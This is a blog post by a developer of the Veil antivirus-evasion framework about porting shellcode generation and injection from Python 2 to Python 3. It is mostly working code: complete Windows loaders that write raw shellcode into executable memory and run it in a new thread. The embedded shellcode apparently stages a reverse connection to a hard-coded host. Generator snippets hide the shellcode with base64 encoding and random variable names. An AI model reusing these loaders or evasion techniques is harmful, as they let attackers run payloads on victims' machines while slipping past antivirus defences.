Shellcode Generation, Manipulation, and Injection in Python 3

It’s no secret that I’ve been working on updating Veil and will soon be releasing Veil 3.0. In the process, I’ve learned quite a bit about the differences between Python 2 and 3. Veil-Evasion was developed in Python 2, and after attempting to recreate some of the same capabilities in Python 3, I’ve learned how “loose” Python 2 can be. In Python 2 we could get away with treating strings and raw bytes interchangeably, whereas Python 3 requires us to state explicitly which one we are working with.

Want to see how shellcode injection works in Python 2? Here’s a sample Python 2 flat script which includes no obfuscation:

EUPnBcpNWMwGi = bytearray('\xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x89\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x09\x68\xc0\xa8\xa2\x91\x68\x02\x00\x21\xe3\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3')
import ctypes as ZKWXnIdQAuP
VjdMidBttQlbLnR = ZKWXnIdQAuP.windll.kernel32.VirtualAlloc(ZKWXnIdQAuP.c_int(0),ZKWXnIdQAuP.c_int(len(EUPnBcpNWMwGi)),ZKWXnIdQAuP.c_int(0x3000),ZKWXnIdQAuP.c_int(0x40))
WgHYTWhElnnZ = (ZKWXnIdQAuP.c_char * len(EUPnBcpNWMwGi)).from_buffer(EUPnBcpNWMwGi)
ZKWXnIdQAuP.windll.kernel32.RtlMoveMemory(ZKWXnIdQAuP.c_int(VjdMidBttQlbLnR),WgHYTWhElnnZ,ZKWXnIdQAuP.c_int(len(EUPnBcpNWMwGi)))
IaoYNg = ZKWXnIdQAuP.windll.kernel32.CreateThread(ZKWXnIdQAuP.c_int(0),ZKWXnIdQAuP.c_int(0),ZKWXnIdQAuP.c_int(VjdMidBttQlbLnR),ZKWXnIdQAuP.c_int(0),ZKWXnIdQAuP.c_int(0),ZKWXnIdQAuP.pointer(ZKWXnIdQAuP.c_int(0)))
ZKWXnIdQAuP.windll.kernel32.WaitForSingleObject(ZKWXnIdQAuP.c_int(IaoYNg),ZKWXnIdQAuP.c_int(-1))

And now, here’s the same script written for Python 3:

import ctypes as bDlDmsfMyuV
miiJDEKLsxLjbM = b'\xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x89\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x09\x68\xc0\xa8\xa2\x91\x68\x02\x00\x21\xe3\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3'
wiseZERld = bDlDmsfMyuV.windll.kernel32.VirtualAlloc(bDlDmsfMyuV.c_int(0),bDlDmsfMyuV.c_int(len(miiJDEKLsxLjbM)),bDlDmsfMyuV.c_int(0x3000),bDlDmsfMyuV.c_int(0x40))
bDlDmsfMyuV.windll.kernel32.RtlMoveMemory(bDlDmsfMyuV.c_int(wiseZERld),miiJDEKLsxLjbM,bDlDmsfMyuV.c_int(len(miiJDEKLsxLjbM)))
CVXWRcjqxL = bDlDmsfMyuV.windll.kernel32.CreateThread(bDlDmsfMyuV.c_int(0),bDlDmsfMyuV.c_int(0),bDlDmsfMyuV.c_int(wiseZERld),bDlDmsfMyuV.c_int(0),bDlDmsfMyuV.c_int(0),bDlDmsfMyuV.pointer(bDlDmsfMyuV.c_int(0)))
bDlDmsfMyuV.windll.kernel32.WaitForSingleObject(bDlDmsfMyuV.c_int(CVXWRcjqxL),bDlDmsfMyuV.c_int(-1))

You can see there is a difference in how the shellcode is handled. In Python 2, I’m storing the shellcode as a bytearray and wrapping it in a ctypes buffer before copying it, whereas in Python 3 it’s stored as bytes and passed to RtlMoveMemory directly. This isn’t a huge difference, but a larger change shows up when manipulating shellcode, such as embedding it in a script that base64 decodes it at runtime.
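To make the type difference concrete, here’s a minimal sketch of how Python 3 treats str, bytes, and bytearray. The four placeholder bytes and the variable names are my own illustration, not anything taken from Veil:

```python
# Placeholder data only; these four values stand in for real shellcode.
text = "\x41\x7d\x00\x0a"   # str: four Unicode code points
raw = b"\x41\x7d\x00\x0a"   # bytes: four immutable byte values

# Python 3 refuses to guess an encoding when building a bytearray from a str.
try:
    bytearray(text)
    str_accepted = True
except TypeError:
    str_accepted = False

# Supplying the encoding explicitly works, as does starting from bytes.
from_text = bytearray(text, "latin-1")
from_raw = bytearray(raw)

# bytearray is mutable; bytes is not.
from_raw[0] = 0x42
try:
    raw[0] = 0x42
    bytes_mutable = True
except TypeError:
    bytes_mutable = False

print(str_accepted, bytes_mutable, from_text == raw, bytes(from_raw))
```

In Python 2 the first bytearray(text) call would simply have worked, which is the kind of looseness I mean.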

This is how I am able to generate shellcode and base64 encode it to be decoded at runtime in a script in Python 2:

# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)

# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)

# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
randctypes = helpers.randomString()

PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'import base64\n'
PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName  + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'

if self.required_options["USE_PYHERION"][0].lower() == "y":
    PayloadCode = encryption.pyherion(PayloadCode)

return PayloadCode

At line 2, we’re receiving a string that contains the shellcode as escaped text, similar to ‘\x41\x7d\x00\x0a…’ (literal backslash-x sequences rather than raw bytes). This string is base64 encoded and then stored in the output payload code. The code which this module creates looks like this:

import ctypes as rLkdwnPpzMBnJr
import base64
IesGKFkNFMC = "XHhmY1x4ZThceDg2XHgwMFx4MDBceDAwXHg2MFx4ODlceGU1XHgzMVx4ZDJceDY0XHg4Ylx4NTJceDMwXHg4Ylx4NTJceDBjXHg4Ylx4NTJceDE0XHg4Ylx4NzJceDI4XHgwZlx4YjdceDRhXHgyNlx4MzFceGZmXHgzMVx4YzBceGFjXHgzY1x4NjFceDdjXHgwMlx4MmNceDIwXHhjMVx4Y2ZceDBkXHgwMVx4YzdceGUyXHhmMFx4NTJceDU3XHg4Ylx4NTJceDEwXHg4Ylx4NDJceDNjXHg4Ylx4NGNceDEwXHg3OFx4ZTNceDRhXHgwMVx4ZDFceDUxXHg4Ylx4NTlceDIwXHgwMVx4ZDNceDhiXHg0OVx4MThceGUzXHgzY1x4NDlceDhiXHgzNFx4OGJceDAxXHhkNlx4MzFceGZmXHgzMVx4YzBceGFjXHhjMVx4Y2ZceDBkXHgwMVx4YzdceDM4XHhlMFx4NzVceGY0XHgwM1x4N2RceGY4XHgzYlx4N2RceDI0XHg3NVx4ZTJceDU4XHg4Ylx4NThceDI0XHgwMVx4ZDNceDY2XHg4Ylx4MGNceDRiXHg4Ylx4NThceDFjXHgwMVx4ZDNceDhiXHgwNFx4OGJceDAxXHhkMFx4ODlceDQ0XHgyNFx4MjRceDViXHg1Ylx4NjFceDU5XHg1YVx4NTFceGZmXHhlMFx4NThceDVmXHg1YVx4OGJceDEyXHhlYlx4ODlceDVkXHg2OFx4MzNceDMyXHgwMFx4MDBceDY4XHg3N1x4NzNceDMyXHg1Zlx4NTRceDY4XHg0Y1x4NzdceDI2XHgwN1x4ZmZceGQ1XHhiOFx4OTBceDAxXHgwMFx4MDBceDI5XHhjNFx4NTRceDUwXHg2OFx4MjlceDgwXHg2Ylx4MDBceGZmXHhkNVx4NTBceDUwXHg1MFx4NTBceDQwXHg1MFx4NDBceDUwXHg2OFx4ZWFceDBmXHhkZlx4ZTBceGZmXHhkNVx4OTdceDZhXHgwOVx4NjhceGMwXHhhOFx4YTJceDkxXHg2OFx4MDJceDAwXHgyMVx4ZTNceDg5XHhlNlx4NmFceDEwXHg1Nlx4NTdceDY4XHg5OVx4YTVceDc0XHg2MVx4ZmZceGQ1XHg4NVx4YzBceDc0XHgwY1x4ZmZceDRlXHgwOFx4NzVceGVjXHg2OFx4ZjBceGI1XHhhMlx4NTZceGZmXHhkNVx4NmFceDAwXHg2YVx4MDRceDU2XHg1N1x4NjhceDAyXHhkOVx4YzhceDVmXHhmZlx4ZDVceDhiXHgzNlx4NmFceDQwXHg2OFx4MDBceDEwXHgwMFx4MDBceDU2XHg2YVx4MDBceDY4XHg1OFx4YTRceDUzXHhlNVx4ZmZceGQ1XHg5M1x4NTNceDZhXHgwMFx4NTZceDUzXHg1N1x4NjhceDAyXHhkOVx4YzhceDVmXHhmZlx4ZDVceDAxXHhjM1x4MjlceGM2XHg4NVx4ZjZceDc1XHhlY1x4YzM="
CnnDRU = bytearray(IesGKFkNFMC.decode('base64','strict').decode("string_escape"))
usGGTaLShwINu = rLkdwnPpzMBnJr.windll.kernel32.VirtualAlloc(rLkdwnPpzMBnJr.c_int(0),rLkdwnPpzMBnJr.c_int(len(CnnDRU)),rLkdwnPpzMBnJr.c_int(0x3000),rLkdwnPpzMBnJr.c_int(0x40))
TaEkbM = (rLkdwnPpzMBnJr.c_char * len(CnnDRU)).from_buffer(CnnDRU)
rLkdwnPpzMBnJr.windll.kernel32.RtlMoveMemory(rLkdwnPpzMBnJr.c_int(usGGTaLShwINu),TaEkbM,rLkdwnPpzMBnJr.c_int(len(CnnDRU)))
TuQYnf = rLkdwnPpzMBnJr.windll.kernel32.CreateThread(rLkdwnPpzMBnJr.c_int(0),rLkdwnPpzMBnJr.c_int(0),rLkdwnPpzMBnJr.c_int(usGGTaLShwINu),rLkdwnPpzMBnJr.c_int(0),rLkdwnPpzMBnJr.c_int(0),rLkdwnPpzMBnJr.pointer(rLkdwnPpzMBnJr.c_int(0)))
rLkdwnPpzMBnJr.windll.kernel32.WaitForSingleObject(rLkdwnPpzMBnJr.c_int(TuQYnf),rLkdwnPpzMBnJr.c_int(-1))

This script decodes the base64 encoded string (the shellcode) and then string-escape decodes the result, which turns the escaped text back into raw bytes. After that, the shellcode is injected into memory and run. Python 2 makes this fairly simple to do; Python 3 is a little more strict about the data types that are used.
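The distinction between escaped text and raw bytes is easy to miss, so here’s a small sketch (written for Python 3, using placeholder values of my own rather than real shellcode). It shows that base64 encoding the escaped text, which is what the Python 2 generator above does, produces a much longer string than base64 encoding the bytes that text describes:

```python
import base64

# Placeholder values only (the sample string from the text, not real shellcode).
escaped_text = r"\x41\x7d\x00\x0a"   # 16 characters of literal text
raw_bytes = b"\x41\x7d\x00\x0a"      # the 4 bytes that text describes

# base64 of the escaped text: must be unescaped again after decoding.
b64_of_text = base64.b64encode(escaped_text.encode("ascii")).decode("ascii")

# base64 of the raw bytes: decoding gives back usable bytes directly.
b64_of_raw = base64.b64encode(raw_bytes).decode("ascii")

print(len(escaped_text), len(b64_of_text))
print(len(raw_bytes), len(b64_of_raw))
```

This is also why the generated Python 2 script needs the extra string_escape step at runtime: the base64 layer only hides the escaped text, not the bytes themselves.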

For example, this is how I am generating shellcode and encoding it prior to embedding it within a script in Python 3:

# Generate the shellcode
Shellcode = self.shellcode.generate(self.cli_opts)
Shellcode = Shellcode.encode('latin-1')
Shellcode = Shellcode.decode('unicode_escape')

# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(bytes(Shellcode, 'latin-1')).decode('ascii')

payload_code = 'import ctypes as ' + randctypes + '\n'
payload_code += 'import base64\n'
payload_code += ShellcodeVariableName +' = base64.b64decode(\"' + EncodedShellcode + '\")\n'
payload_code += RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
payload_code += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'

Immediately there’s a difference in how shellcode generation and manipulation are handled. In this case, line 2 still receives the shellcode as a string similar to ‘\x41\x7d\x00\x0a…’, but you can’t base64 encode a string in Python 3; it requires input in the form of bytes. Unfortunately, calling .encode() with no arguments (which uses UTF-8) on the shellcode doesn’t properly encode it for injection later on in the script. It took a while, but with the help of @raikiasec, we were able to figure out that encoding with latin-1 (.encode('latin-1')) allowed the string shellcode to be properly encoded.
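As a rough illustration of both points, the sketch below (my own placeholder values, not Veil code) shows base64.b64encode rejecting a str, and how UTF-8 and latin-1 differ once a character’s code point is above 0x7F:

```python
import base64

# Placeholder string: two code points, U+00FC and U+00E8.
sample = "\xfc\xe8"

# b64encode only accepts bytes-like input in Python 3.
try:
    base64.b64encode(sample)
    accepted_str = True
except TypeError:
    accepted_str = False

# UTF-8 (the default) expands each of these code points to two bytes,
# while latin-1 maps code points 0-255 to exactly one byte each.
as_utf8 = sample.encode()
as_latin1 = sample.encode("latin-1")

print(accepted_str, as_utf8, as_latin1)
```

Only the latin-1 result has the same length and values as the original sequence, which is what you want if those values are going to be copied into memory byte for byte.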

Obviously, that wasn’t the only step that needed to be taken. After encoding as latin-1, the shellcode needs to be decoded with unicode_escape, which turns the escaped text into the actual characters, and then re-encoded as latin-1 to return it to bytes (hint: every time you .encode() something, you convert from a string to bytes; every time you .decode() something, you convert from bytes to a string). That final latin-1 encoding yields the raw shellcode bytes, which are then base64 encoded. Beyond that, base64 encoding returns bytes, so the output needs to be decoded as ASCII before it is stored in the output Python script. Once this is done, it creates a script similar to the one below:

import ctypes as AKkkiwvmOTZmuXU
import base64
mMgzKuJ = base64.b64decode("/OiGAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8i0wQeONKAdFRi1kgAdOLSRjjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ldaDMyAABod3MyX1RoTHcmB//VuJABAAApxFRQaCmAawD/1VBQUFBAUEBQaOoP3+D/1ZdqCWjAqKKRaAIAIeOJ5moQVldomaV0Yf/VhcB0DP9OCHXsaPC1olb/1WoAagRWV2gC2chf/9WLNmpAaAAQAABWagBoWKRT5f/Vk1NqAFZTV2gC2chf/9UBwynGhfZ17MM=")
COZaAf = AKkkiwvmOTZmuXU.windll.kernel32.VirtualAlloc(AKkkiwvmOTZmuXU.c_int(0),AKkkiwvmOTZmuXU.c_int(len(mMgzKuJ)),AKkkiwvmOTZmuXU.c_int(0x3000),AKkkiwvmOTZmuXU.c_int(0x40))
AKkkiwvmOTZmuXU.windll.kernel32.RtlMoveMemory(AKkkiwvmOTZmuXU.c_int(COZaAf),mMgzKuJ,AKkkiwvmOTZmuXU.c_int(len(mMgzKuJ)))
WzFChtFNp = AKkkiwvmOTZmuXU.windll.kernel32.CreateThread(AKkkiwvmOTZmuXU.c_int(0),AKkkiwvmOTZmuXU.c_int(0),AKkkiwvmOTZmuXU.c_int(COZaAf),AKkkiwvmOTZmuXU.c_int(0),AKkkiwvmOTZmuXU.c_int(0),AKkkiwvmOTZmuXU.pointer(AKkkiwvmOTZmuXU.c_int(0)))
AKkkiwvmOTZmuXU.windll.kernel32.WaitForSingleObject(AKkkiwvmOTZmuXU.c_int(WzFChtFNp),AKkkiwvmOTZmuXU.c_int(-1))
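If you want to try the encode/decode chain described above in isolation, here’s a minimal sketch that runs it on a harmless placeholder string and checks that the result round-trips. The helper name embed_ready and the sample value are hypothetical, chosen only for illustration:

```python
import base64


def embed_ready(escaped_text):
    """Hypothetical helper mirroring the encode/decode steps described above."""
    # str -> bytes; the content is still escaped text such as \x41
    as_bytes = escaped_text.encode("latin-1")
    # bytes -> str; each \xNN sequence becomes the code point U+00NN
    unescaped = as_bytes.decode("unicode_escape")
    # str -> bytes; each code point 0-255 becomes exactly one byte
    raw = unescaped.encode("latin-1")
    # bytes -> base64 bytes -> ASCII str that can be pasted into a script
    return base64.b64encode(raw).decode("ascii")


# Placeholder input only, not real shellcode.
sample = r"\x41\x7d\x00\x0a\xfc\xe8"
encoded = embed_ready(sample)
decoded = base64.b64decode(encoded)

print(encoded)
print(decoded)
```

The generated script only has to call base64.b64decode() on the embedded string, because everything else was already resolved at generation time.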

The hardest concept for me to grasp was the proper encoding/decoding format that the shellcode needs to be in for the different types of manipulation I perform on it (base64 encoding, letter substitution, encryption, etc.). Hopefully the code examples here help anyone else who is looking into using Python 3 to manipulate shellcode, inject it into memory, or more.

If there’s a better way to do the above, or if you have any questions, don’t hesitate to send a message my way! Otherwise, be sure to check out Veil 3’s release at NullCon and you’ll have plenty of examples to look at!